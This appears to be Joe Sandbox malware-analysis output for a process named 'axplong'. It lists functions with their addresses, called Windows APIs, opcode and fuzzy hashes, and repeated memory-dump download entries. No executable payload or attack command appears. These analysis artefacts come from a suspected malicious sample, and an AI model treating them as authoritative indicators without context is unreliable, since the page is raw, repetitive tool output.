Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: 412fd6cbaac4db1acfa01d66c23177b9fde83b4c2c5d165d8ed2601c5ae6fb5e
Instruction ID: a81ce9a112c97decb0987b99ad4a9c459ed97c22dc3f64db6318bf80f8e16ffa
Opcode Fuzzy Hash: 412fd6cbaac4db1acfa01d66c23177b9fde83b4c2c5d165d8ed2601c5ae6fb5e
Instruction Fuzzy Hash: 75D11D70E00619AFDB24ABA8DC5E7AD7F72BB85314F90428DE415673C2DB355E808BD2

Function 005F6E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 005F6E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 005F6E7D
__dosmaperr.LIBCMT ref: 005F6F12

Part of subcall function 005F7177: __dosmaperr.LIBCMT ref: 005F71AC

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 1c1dd34abc866d05e31b7daa0784e7e197ffa7293ccc3c30e4ce178166e6fb8a
Instruction ID: 54b8aa8374c9c08bcfbfdc426def91cb73d41c03a7e74f6b290b80cedcab6db9
Opcode Fuzzy Hash: 1c1dd34abc866d05e31b7daa0784e7e197ffa7293ccc3c30e4ce178166e6fb8a
Instruction Fuzzy Hash: 3C413E75900209ABDB24EFB5E8459BFBBF9FF89300B10482DF656D3610EA35A904CB61

Function 005F6C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6914c4bd18b283e9d77a0589bf073aec8b846d068071b6b1382f9f4fa28cedf4
Instruction ID: 98a2d0f1d02a5b87188403aedced66bab5120719da0e7ba8fe372507cd48da9b
Opcode Fuzzy Hash: 6914c4bd18b283e9d77a0589bf073aec8b846d068071b6b1382f9f4fa28cedf4
Instruction Fuzzy Hash: 6821C43290120D7AEB117B649C4ABBF3F29BF81338F100211FB246B1D1DA785E0596A2

Function 005FD4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c16fb42866b4599c92f59bbbde8d7a0e44eb339c90fba6ee7a24f1314a06179d
Instruction ID: 261a735509d940228009b6f8e9f7f16e3c6cdd325c711724376e7da6965f5af4
Opcode Fuzzy Hash: c16fb42866b4599c92f59bbbde8d7a0e44eb339c90fba6ee7a24f1314a06179d
Instruction Fuzzy Hash: 7961F372D0121D8BDF21AFA8D8897FDBFB3FB86315F244116E649AB250D6398C008B71

Function 005C82B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 005C8454

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: cfc703a92a9cca67920c52dd886bec507332b4996a016211b8dcf51f5631f2f8
Instruction ID: e871b9e85cac024a02b0bd58e26af19616ad8d185e1c83f3b5bb8b5488e0d6e6
Opcode Fuzzy Hash: cfc703a92a9cca67920c52dd886bec507332b4996a016211b8dcf51f5631f2f8
Instruction Fuzzy Hash: 525129709002599FEF28EBA8CD89BEDBF75BB45704F50429DE804A72C1EF345A80CB91

Function 005F6F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 005F6FB3

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: b6d873e3887e412e5deb722045b4a5c939a312a2f7a06c58098e38baecd1bdc4
Instruction ID: 7e25fecc4c6e2df6d41f95b58e2ba8f250e1724689e636fccc90e5f5739da689
Opcode Fuzzy Hash: b6d873e3887e412e5deb722045b4a5c939a312a2f7a06c58098e38baecd1bdc4
Instruction Fuzzy Hash: CE112EB290020DABDB10DE95D884EEFBBBDAF48314F105266E615E2184EB34EB44CB61

Function 005FD6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,005FA5ED,?,005F74AE,?,00000000,?), ref: 005FD731

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d2b462a03c035b2c364bc4e8d07009e0bb4f696396d48fec8f29a730b3fa6b02
Instruction ID: 89f44aa1417138a5cca965210bc457b99f24fff6c8452fe6f654c6c03a643afc
Opcode Fuzzy Hash: d2b462a03c035b2c364bc4e8d07009e0bb4f696396d48fec8f29a730b3fa6b02
Instruction Fuzzy Hash: 39F0B43164752EA69B213A219D09B7B7FABFB827A0B184511AE049E181CA28D80046F0

Function 005FAF0B Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,B5FE596C,?,?,005DD32C,B5FE596C,?,005D78FB,?,?,?,?,?,?,005C7435,?), ref: 005FAF3E

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9587976e23fbd0bbede33a713f2795f387f9d7274f6cb9f5e62fecd018333add
Instruction ID: 3268e640296d236e96d0f3ec1cde3afbd34bda1cc55863c1df284ae8391f486b
Opcode Fuzzy Hash: 9587976e23fbd0bbede33a713f2795f387f9d7274f6cb9f5e62fecd018333add
Instruction Fuzzy Hash: 33E0E5FD24621E569B2022359C4877B3E89BB813B1F040150AF0C9E080DA2CCC0082E3

Function 005D6AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 005D6B65

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b5586f444c22b58bc9be86c395500b7fa2dd7914930ee342a5e8dd0dc03e939c
Instruction ID: 850dc75946cd20e6d06e564c36cf760a187a5776a19a4a51b357583e1f20ac9b
Opcode Fuzzy Hash: b5586f444c22b58bc9be86c395500b7fa2dd7914930ee342a5e8dd0dc03e939c
Instruction Fuzzy Hash: FCF0D631E00A19BBC7107BAC9C1AB1D7F76B746764F80034AE811673D1EB3459008BD2

Function 04C908C2 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2532848384.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4c90000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 397b6ae8a4bc2e3a1ce7ef26adccfb7b7ea049e02aad21beecec3c4554fe12e5
Instruction ID: 553b4842f2fc855951aaf40bb238d4834d187a943d6a2171f97e3df848140ac6
Opcode Fuzzy Hash: 397b6ae8a4bc2e3a1ce7ef26adccfb7b7ea049e02aad21beecec3c4554fe12e5
Instruction Fuzzy Hash: B821AEEB20C1107EB44191476F18AFB67AEE7D6B30734C92BF417C6542E2A81E4D2072

Function 04C9089F Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2532848384.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4c90000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5622d8ee9baf4ab56ca7c573d0c4ed8931d08bedaab53767ec30fedb5e0afc60
Instruction ID: a9dba68912f0014270ef0637b9c0bfbdd073ed573df53337ccbeb7fae1930e90
Opcode Fuzzy Hash: 5622d8ee9baf4ab56ca7c573d0c4ed8931d08bedaab53767ec30fedb5e0afc60
Instruction Fuzzy Hash: 4F21C2BB20C110BEB641D6476B18AFA77EEDBC6B30735882EF442C6502E2A56D496172

Function 04C9085E Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2532848384.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4c90000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f97d67aa989fb50d7ce321669964e130c94e484c77319896a25d85161aadd99
Instruction ID: c252b27e3f14f3a5b86976060507c552575d627dcd4246a30af874d8b9689096
Opcode Fuzzy Hash: 8f97d67aa989fb50d7ce321669964e130c94e484c77319896a25d85161aadd99
Instruction Fuzzy Hash: 54118EEB24C1107D704191477F28AFB67AFE6D6B30335C82BF807C2542F2A91E496032

Function 04C90868 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2532848384.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4c90000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d222f6053774935359c1ed66c64bc9c428e327e00c8a293ca5e3f1c94ace31c
Instruction ID: 3cee693f08fd3f364767146b81d92b6e9c44d8558abe103ff7ec96adfcc5c219
Opcode Fuzzy Hash: 6d222f6053774935359c1ed66c64bc9c428e327e00c8a293ca5e3f1c94ace31c
Instruction Fuzzy Hash: B511B4F720C110BE7541D1476F18AFBA7AEE6C6B30335842FF407C2542E2A41E497132

Function 04C90885 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2532848384.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4c90000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f137a5bf6c3beb2f91761aca601a5408aa879babc5df74c6b3479053ee94d68
Instruction ID: 2cba0ecfab55b26c9f793bb68aea0a00a253e5167b2d3b5eee5b7077e9171cef
Opcode Fuzzy Hash: 1f137a5bf6c3beb2f91761aca601a5408aa879babc5df74c6b3479053ee94d68
Instruction Fuzzy Hash: 981190E720C1107EB54191477B28AFAA7AEE6D6B30335C82BF457C6642E2991E4E6132

Function 04C90945 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2532848384.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4c90000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7591f6f9dfa464b96c4dfff61e49ea29942993bebbc3ea7f7a208935da67d9
Instruction ID: ab5ab848ba5eae84fc3c1ab042e1b58afd1c37b25bc3fdb2aad0f39891b7d098
Opcode Fuzzy Hash: 4a7591f6f9dfa464b96c4dfff61e49ea29942993bebbc3ea7f7a208935da67d9
Instruction Fuzzy Hash: 0FF0DCA2248050BFF702212B086E2FEA7D75BA3920B3B086ED503C7742F28999497023

Function 04C90923 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2532848384.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4c90000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3909673e47ed77480dc72e9767b280f7675b65ce0bb3b1ef45d542fd4f22b434
Instruction ID: ed144bf5a7dddddabbecadf727a8a172d843373638be5582c4c2ee3546400cd7
Opcode Fuzzy Hash: 3909673e47ed77480dc72e9767b280f7675b65ce0bb3b1ef45d542fd4f22b434
Instruction Fuzzy Hash: ADF054A224C0506FF742111718651FA77EB5B93A2472A405DD496C7742F29954497162

Non-executed Functions

Function 00603068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 006031E3

Strings

1#IND, xrefs: 00604373
1#QNAN, xrefs: 00604381
1#INF, xrefs: 0060439E
1#SNAN, xrefs: 0060437A

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 051b46213303549b02183886b848ff64477f779e49b307cc0e5446509c328563
Instruction ID: a51b465394680bbe05e2b85842204690d07a8341087415a440fc598914c6555f
Opcode Fuzzy Hash: 051b46213303549b02183886b848ff64477f779e49b307cc0e5446509c328563
Instruction Fuzzy Hash: 99C23CB1E446298FDB29CE28DD407EAB7BAEB44305F1441EAD54DE7380E775AE818F40

Function 00602BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: f06b52cad1b85d529497fa05d8c1b17039e635f3cdc1f93f0d0cd0674750db03
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 9FF14171E4121A9FDF18CF68C8946EEB7B6FF88314F15816AD415A7384D7319E41CB90

Function 005DCB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,005DCE82,?,?,?,?,005DCEB7,?,?,?,?,?,?,005DC42D,?,00000001), ref: 005DCB33

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
